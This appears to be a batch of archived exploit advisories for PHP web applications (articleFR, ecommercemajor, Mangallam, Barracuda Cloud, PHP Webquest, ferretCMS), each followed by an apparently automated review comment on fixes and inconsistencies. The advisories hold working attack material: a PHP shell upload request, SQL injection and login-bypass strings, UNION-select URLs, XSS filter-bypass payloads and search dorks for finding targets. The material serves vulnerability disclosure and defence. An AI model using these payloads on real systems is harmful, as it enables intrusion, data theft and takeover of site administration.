- Vulnerable parameter: username
- Query: SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username ='[Injection HERE]'
- Vulnerable function:
function getProfile($_username, $_connection) {
$_q = "SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username = '" . $_username . "'";
$_result = single_resulti($_q, $_connection);
$_retval['id'] = $_result['id'];
$_retval['name'] = $_result['name'];
$_retval['username'] = $_result['username'];
$_retval['password'] = $_result['password'];
$_retval['email'] = $_result['email'];
$_retval['website'] = $_result['website'];
$_retval['blog'] = $_result['blog'];
$_retval['date'] = $_result['date'];
$_retval['isactive'] = $_result['isactive'];
$_retval['activekey'] = $_result['activekey'];
$_retval['membership'] = $_result['membership'];
return $_retval;
}
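Review bot: `getProfile` builds the query by string concatenation (`"... WHERE username = '" . $_username . "'"`), so the fix is to pass the username as a bound parameter of a prepared statement (mysqli or PDO) rather than escaping it; the advisory names the vulnerable function but not a fixed revision, and `Software Link` points at the GitHub repository without a commit, so a defender cannot tell whether upstream is corrected. The request goes to `/articlefr/register/` while the vulnerable file is `system/profile.functions.php`; the path from the `username` POST field to `getProfile` is not shown, and `single_resulti(...)` looks like a typo for a `single_result` helper but may be the project's real name, so it should be verified against the repository rather than silently edited. There is also no vendor-notification timeline.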

platforms/php/webapps/35858.txt Executable file

@ -0,0 +1,97 @@
# Exploit Title: Arbitrary File Upload in articleFR CMS 3.0.5
# Google Dork: N/A
# Date: 01/21/2015
# Exploit Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://freereprintables.com
# Software Link: https://github.com/articlefr/articleFR
# Version: version 3.0.5
# Tested on: Linux
# CVE : N/A
::PROOF OF CONCEPT::
- REQUEST:
POST /articlefr/dashboard/videouploader.php HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/articlefr/dashboard/videos/fileupload/
Content-Length: 414
Content-Type: multipart/form-data; boundary=---------------------------277651700022570
Cookie: GEAR=local-5422433b500446ead50002d4; PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------277651700022570
Content-Disposition: form-data; name="myVideo"; filename="img.php"
Content-Type: image/gif
<?php
phpinfo();
?>
-----------------------------277651700022570
Content-Disposition: form-data; name=""
undefined
-----------------------------277651700022570
Content-Disposition: form-data; name=""
undefined
-----------------------------277651700022570--
- RESPONSE:
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 03:10:30 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Type: text/html
Vary: Accept-Encoding
Accept-Ranges: none
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 36
[String_Random].php
- Shell link: http://target.org/articlefr2/dashboard/videos/[String_Random].php
- Vulnerable file: articlefr/dashboard/videouploader.php
- Vulnerable code:
<?php
$output_dir = dirname(dirname(__FILE__)) . "/videos_repository/";
if(isset($_FILES["myVideo"]))
{
$ret = array();
$error =$_FILES["myVideo"]["error"];
if(!is_array($_FILES["myVideo"]["name"]))
{
$fileName = $_FILES["myVideo"]["name"];
$extension = pathinfo($fileName, PATHINFO_EXTENSION);
$newFileName = md5(uniqid() . $fileName) . '.' . $extension;
move_uploaded_file($_FILES["myVideo"]["tmp_name"], $output_dir.$newFileName);
$ret[]= $newFileName;
}
echo $newFileName;
}
?>
::REFERENCE::
- http://www.itas.vn/news/itas-team-phat-hien-lo-hong-arbitrarily-file-upload-trong-articlefr-cms-71.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
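Review bot: the vulnerable handler keeps the client-supplied extension (`$extension = pathinfo($fileName, PATHINFO_EXTENSION)`) and writes into a directory the response shows is web-served, with no allow-list, so the `img.php` upload is executed on request; the remediation is a server-side extension and content allow-list (not the client's `Content-Type: image/gif`), storage outside the document root or in a directory with PHP execution disabled, and a generated name that is never echoed back as a reachable path. Two details in the file do not line up: `$output_dir` is `videos_repository/` while the 'Shell link' is under `dashboard/videos/` on an `articlefr2` path, and `echo $newFileName;` runs even on the `is_array` branch where it was never assigned. The disclaimer shows mis-encoded quotes (`?AS IS?`), and no fixed version is given.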

platforms/php/webapps/35878.txt Executable file

@ -0,0 +1,71 @@
##################################################################################################
#Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass
#Author : Manish Kishan Tanwar
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Date : 22/01/2015
#Discovered at : IndiShell Lab
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi
#email : manish.1046@gmail.com
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
ecommercemajor is the php based CMS for ecommerce portal
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
SQL injection vulnerability:-
==============================
in file product.php data from GET parameter 'productbycat' is not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
---------------------
$getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc";
---------------------
POC
http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI
Authentication Bypass:-
==============================
file index.php under directory __admin has SQL injection vulnerability
parameter username and password suppliedin post parameter for checking valid admin username and password is not getting filter before passing into SQL query which arise authentication bypass issue.
vulnerable code is
-------------------
if(isset($_POST[login]))
{
$check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'";
$checkresult=mysql_query($check);
$checkcount=mysql_num_rows($checkresult);
if($checkcount>0)
{
$checkrow=mysql_fetch_array($checkresult);
$_SESSION[adminname]=$checkrow[adminname];
$_SESSION[adminloginstatus]="success";
echo "<script>window.location='home.php';</script>";
}
--------------------
POC
open admin panel
http://127.0.0.1/ecommercemajor/__admin/
username: ' or '1337'='1337
password: ' or '1337'='1337
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
--==[[Love to]]==--
#Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
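Review bot: the quoted `__admin/index.php` snippet contains a second authentication bug the advisory does not mention, and the write-up gives no fix. In `$check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'";` the password column is compared against the username field, so the submitted password is never checked at all; that is a logic flaw independent of the injection and should be reported alongside it. The remediation for both findings is the same and should be stated: replace the deprecated `mysql_*` calls with mysqli or PDO prepared statements, cast `$_GET[productbycat]` to an integer before it reaches `catid=`, and stop comparing passwords as plain-text column values. Minor: `$_POST[login]`, `$_SESSION[adminname]` and `$checkrow[adminname]` use unquoted array keys, which emit notices and suggest the code was never run with error reporting enabled.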

platforms/php/webapps/35899.txt Executable file
@ -0,0 +1,146 @@
Document Title:
===============
Mangallam CMS - SQL Injection Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1421
Release Date:
=============
2015-01-26
Vulnerability Laboratory ID (VL-ID):
====================================
1421
Common Vulnerability Scoring System:
====================================
8.9
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote SQL-Injection web vulnerability in the official Mangallam Content Management System 2015-Q1.
Vulnerability Disclosure Timeline:
==================================
2015-01-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Mangallam Content Management System 2015-Q1.
The sql vulnerability allows an attacker to inject sql commands to compromise the application & database management system.
The sql injection vulnerability is located in the `newsid` value of the vulnerable `news_view.php` application file. Remote attackers
are able to inject own sql commands by manipulation of the vulnerable newsid value in the `news_view.php` file. A successful attack
requires to manipulate a GET method request with vulnerable `newsid` value to inject own sql commands. The injection is a classic
order by sql injection that allows to compromise the web-application and connected database management system. The request method to
inject own sql commands is GET and the vulnerability is located on the application-side of the service.
The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.9.
Exploitation of the application-side web vulnerability requires no privileged web-application user account and no user interaction.
Successful exploitation of the security vulnerability result in web-application and database management system compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] News
Vulnerable File(s):
[+] news_view.php
Vulnerable Parameter(s):
[+] newsid
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Dork(s):
allinurl:news_view.php?newsid=
title:Powered By Powered by Mangallam
PoC:
http://localhost:8080/news_view.php?newsid=-1'[REMOTE SQL-INJECTION VULNERABILITY!]--
Reference(s):
http://localhost:8080/news_view.php
Solution - Fix & Patch:
=======================
The remote vulnerability can be patched by usage of a prepared statement next to the newsid GET method request.
Restrict and filter the newsid value and disallow input of special chars. Prevent disaplaying of php errors by usage of the (0)error (php) function.
Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the content management system is estimated as critical.
Credits & Authors:
==================
IranGuard Security Team - P0!s0nC0d3
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
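Review bot: the severity fields contradict each other and the fix advice names a function that does not exist. `Severity Level: Critical` and `estimated as critical` in the Security Risk section disagree with `estimated as high with a cvss (common vulnerability scoring system) count of 8.9` in the technical details; pick one. The solution's `Prevent disaplaying of php errors by usage of the (0)error (php) function` refers to no real PHP function; what is presumably meant is `display_errors = Off` in php.ini (or `ini_set('display_errors', '0')`) with errors logged to a file, and it should be stated that precisely. The advisory also lacks a vendor URL, an affected-version field and any quoted code; `2015-Q1` is not a release number an operator can compare against. The `newsid` fix should be a prepared statement with the value bound as an integer, which closes every injection variant, not just the `order by` case the text describes.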

platforms/php/webapps/35900.txt Executable file
@ -0,0 +1,143 @@
Document Title:
===============
Barracuda Networks Cloud Series - Filter Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=754
Barracuda Networks Security ID (BNSEC): 731
Release Date:
=============
2015-01-19
Vulnerability Laboratory ID (VL-ID):
====================================
754
Common Vulnerability Scoring System:
====================================
4.5
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.
Vulnerability Disclosure Timeline:
==================================
2015-01-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Cloud Control Center 2014 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script codes.
The barracuda filter blocks for example standard iframes, scripts and other invalid code context: The cloud service has a own exception-handling
to parse or encode malicious injected web context. The mechanism filters the first request and sanitizes the output in every input field.
During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked! In the next step the attacker splits (%20%20%20)
the request and injects at the end an onload frame to an external malicious source. The second iframe with the onload alert executes the script codes after
the validation encoded only the first script code tag. The second script code tag can bypass the applicance filter mechanism and executes in the web context
of affected modules. The secure validation does not recognize a splitted request which results in client-side and application-side script code execution in
the cloud series products.
The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium).
Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation
of affected or connected module context.
Vulnerable Request Method(s):
[+] POST & GET
Proof of Concept (PoC):
=======================
The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <
PoC:
<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>
Solution - Fix & Patch:
=======================
The issue can be patched by a secure validation of the full message input body context of any input or request method attempt.
Ensure that the validaton does not only encode the first injected script code since a empty char arrives. Filter all web context
that runs through the requesting procedure and parse separatly to prevent script code injection attacks.
Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service.
Security Risk:
==============
The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
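Review bot: the affected product is described inconsistently and the vulnerable input is never named. `Product: Cloud Control Center 2014 Q2` under Affected Product(s) conflicts with `Cloud Series Appliance Applications 2014-Q1` in the technical details, and the PoC supplies a payload but no module, form field or request that carries it; `Vulnerable Request Method(s): [+] POST & GET` is the only locator. Without the field name an administrator cannot confirm that the patch mentioned in the Solution (`Barracuda Networks patched the vulnerability`) covers their deployment, and neither a fixed release version nor a link to the vendor's BNSEC 731 notice is given. The fix text is sound in substance (validate the whole input body rather than the first tag only) but should name the concrete control: normalise or reject the whitespace-padded split before validation and HTML-encode every field on output instead of sanitising a single match.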

platforms/php/webapps/35906.txt Executable file
@ -0,0 +1,268 @@
# Exploit Title: sql injection
# Google Dork: inurl:webquest/soporte_horizontal_w.php?id_actividad=
# Date: [24/01/2015]
# Exploit Author: [jord4nroo7] anonjo@aol.com
# Vendor Homepage: [http://phpwebquest.org]
# Software Link: [http://phpwebquest.org/?page_id=14]
# Version: [phpwebquest-2.6]
# Tested on: [windows 8.1]
#Exploit: sql inhection found on phpwebquest script version 2.6
#
#example http://localhost/phpwq/webquest/soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27'
#---------------------------
if ($_GET['id_actividad']!=''){
$id_actividad=$_GET['id_actividad'];--------->sqlinjection here
}else{
$id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
$id_pagina=$_GET['id_pagina'];
}else{
$id_pagina='1';
$texto_actual=$texto_alternativo;
$imagen_actual='../imagenes/no_imagen.gif';
}
#----------------------------
<?
session_cache_limiter('nocache,private');
session_start();
session_set_cookie_params(0, "/", $HTTP_SERVER_VARS["HTTP_HOST"], 0);
include("../include/mysql.php");
include("../include/idioma.php");
$base=$mysql_db;
$c=mysql_connect($mysql_server,$mysql_login,$mysql_pass);
mysql_select_db ($base, $c);
#para solucionar un problema que se plantea cuando los usuarios crean la actividad pero no crean páginas
if ($_GET['id_actividad']!=''){
$id_actividad=$_GET['id_actividad'];
}else{
$id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
$id_pagina=$_GET['id_pagina'];
}else{
$id_pagina='1';
$texto_actual=$texto_alternativo;
$imagen_actual='../imagenes/no_imagen.gif';
}
#echo "PAGINA DEL GET:".$id_pagina."<br>";
#echo "PAGINA DEL GET:".$id_pagina."<br>";
$sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
# echo $indice.":".$valor."<br>";
$campo[$indice]=$valor;
}
}
}
$sentencia="select * from pagina where id_actividad=".$id_actividad." order by num_pagina asc";
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
#echo $indice.":".$valor."<br>";
$campo[$j][$indice]=$valor;
}
}
$j++;
}
for ($cont=1; $cont<=5; $cont++){
if ($campo[$cont]['num_pagina']==$id_pagina){
$texto_actual=$campo[$cont]['texto'];
$imagen_actual=$campo[$cont]['imagen'];
}
}
$resta=0;
$tamano_enlaces=$campo['font_size'] - $resta ;
$tamano_titulo=$campo['font_size'];
#echo $tamano_titulo;
?>
<html>
<head>
<title>PHP Webquest</title>
<!-- Webquest elaborada con PHP Webquest http://www.phpwebquest.org
Programa elaborado por Antonio Temprano bajo Licencia GPL
Puede ser utilizado gratuitamente por quien quiera hacerlo con fines
educativos y con la obligación de no quitar estas líneas de código
-->
<style>
table {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
font-weight : normal;
color: <? echo $campo['color_texto_principal'];?>;
}
a {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces'];?>;
font-weight : normal;
}
a:hover {
position: relative;
top: 1px;
left: 1px;
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces_resaltados'];?>;
font-weight : normal;
}
div.phpwebquest { font-size : 7.5pt;}
div.phpwebquest a:link { font-size : 7.5pt;}
div.phpwebquest a:hover { font-size : 7.5pt;}
div.phpwebquest a { font-size : 7.5pt;};
</style>
</head>
<body bgcolor="<? echo $campo['color_fondo_pagina'];?>">
<div align="center">
<table width="750" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_pagina'];?>">
<tr>
<td><div align="center">
<table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_texto'];?>">
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td height="50"><div valign="middle" align="center"><h1><font color="<? echo $campo['color_texto_titulo'];?>"><? echo $campo['titulo'];?></font></h1></div></td>
</tr>
<tr>
<? if ($id_pagina==1){
$titular=$introduccion;
}elseif($id_pagina==2){
$titular=$tareas;
}elseif($id_pagina==3){
$titular=$proceso;
}elseif($id_pagina==4){
$titular=$evaluacion;
}else{
$titular=$conclusiones;
}
?>
<td height="50" bgcolor="<? echo $campo['color_cuadro_pagina'];?>"><font color="<? echo $campo['color_texto_tipo'];?>"><div valign="middle" align="center"><h3><? echo $titular;?></h3></div></font></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="81%" valign="top"><table width="100%" height="141" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" height="139"> </td>
<td width="97%" valign="middle"><div align="left">
<table width="100%" height="134" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" valign="top"><div align="left"><img src="<? echo $imagen_actual;?>"></div></td>
<td width="2%"> </td>
<td width="97%"><? echo $texto_actual;?><br>
<table align=center width="80%" border=0 bgcolor="<? echo $campo['color_cuadro_menu'];?>">
<? if ($id_pagina==3){
echo '<tr></tr>';
$sentencia="select url, descripcion from url where id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
if($indice=='url'){
echo '<tr><td><div class="celdamenu"><a href='.$valor.' target="_blank"></div>';
}else{
echo $valor."</td></tr>";
}
$url[$j][$indice]=$valor;
}
}
$j++;
}
}
mysql_close($c);
?>
</table>
</td>
</tr>
</table>
</div></td>
<td width="2%"> </td>
</tr>
</table></td>
<td width="15%" valign="top">
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_texto'];?>" bordercolor="#FFFFFF"><tr><td> </td></tr></table>
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_menu'];?>" bordercolor="#FFFFFF">
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=1"; ?>"> <? echo $enlace_introduccion; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=2"; ?>"> <? echo $enlace_tareas; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=3"; ?>"> <? echo $enlace_proceso; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=4"; ?>"> <? echo $enlace_evaluacion; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=5"; ?>"> <? echo $enlace_conclusiones; ?></a></font></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="19">
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="55%"><div class="phpwebquest" align="right"><? echo $elaborada; ?> <? echo $campo['autor'];?> <? echo $con; ?></div></td>
<td width="45%"><div class="phpwebquest" align="left"><a href="http://www.phpwebquest.org"> PHPWebquest</a></div></td>
</tr>
</table>
</td>
</tr>
</table>
</div></td>
</tr>
</table>
</div>
</body>
</html>
#greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers
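Review bot: the example URL targets a parameter that never reaches a query, and the annotated line mixes prose into code. The example `soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27'` places the quote in `id_pagina`, but in the quoted source `$id_pagina` is only ever compared (`if ($campo[$cont]['num_pagina']==$id_pagina)`, `if ($id_pagina==1)`); the parameter marked by `$id_actividad=$_GET['id_actividad'];--------->sqlinjection here` is the one concatenated into `"SELECT * FROM actividad WHERE id_actividad=".$id_actividad` and the two later `select` statements, so the example should match the annotation. That annotation belongs in a comment, not appended to the PHP statement. `# Exploit Title: sql injection` should name the product (PHP Webquest 2.6 per the Version field), and most of the 268 lines are HTML template unrelated to the finding; the three queries suffice. For the maintainer: cast `$id_actividad` with `(int)` or bind it in a prepared statement, and replace the `mysql_*` calls and `$HTTP_SERVER_VARS` (removed in PHP 5.4) regardless.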

platforms/php/webapps/35914.txt Executable file
@ -0,0 +1,121 @@
Advisory:
Advisory ID: SROEADV-2015-10
Author: Steffen Rösemann
Affected Software: ferretCMS v. 1.0.4-alpha
Vendor URL: https://github.com/JRogaishio/ferretCMS
Vendor Status: vendor will patch eventually
CVE-ID: -
Tested on:
- Firefox 35, Iceweasel 31
- Mac OS X 10.10, Kali Linux 1.0.9a
==========================
Vulnerability Description:
==========================
The content management system ferretCMS v.1.0.4, which is currently in
alpha development stage, suffers from multiple stored/reflecting XSS- and
SQLi-vulnerabilities in its administrative backend.
Moreover, there exists the possibility to upload arbitrary files via the
administrative backend, which can be executed by unauthenticated users, too.
==================
Technical Details:
==================
A reflecting XSS vulnerability can be found in the parameter "action" used
in the file admin.php:
http://
{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Stored XSS vulnerabilities resides in the logging functionality of
ferretCMS. On the administrative backend, the administrator has the
opportunity to watch events stored in a log. An event, that gets logged,
are login-attempts to the administrative backend, where the used username
is displayed, too. An attacker can abuse this, by trying to log in with
JavaScript-code instead of a username. That code gets executed in the logs.
Login-form is located here: http://{TARGET}/admin.php
XSS gets executed here: http://{TARGET}/admin.php?type=log&action=read
Another stored XSS vulnerability can be found in the pagetitle of a new
blog entry that is created by the administrator:
vulnerable form: http://{TARGET}/admin.php?type=page&action=insert&p=
XSS gets executed here: http://{TARGET}/admin.php?type=page&action=read
The following URLs are prone to SQL injection attacks:
http://
{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
http://
{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
http://
{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
http://
{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
http://
{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+
Last but not least there is a file-upload functionality in the
administrative backend of ferretCMS. The administrator can upload arbitrary
files here via the following URL:
http://localhost/ferretCMS/admin.php?type=uploader&action=upload
Any unauthenticated user can execute/read those files that had been
uploaded by visiting the following URL:
http://{TARGET}/custom/uploads/{NAME_OF_THE_UPLOADED_FILE}
=========
Solution:
=========
Vendor responded, issues will be patched eventually.
====================
Disclosure Timeline:
====================
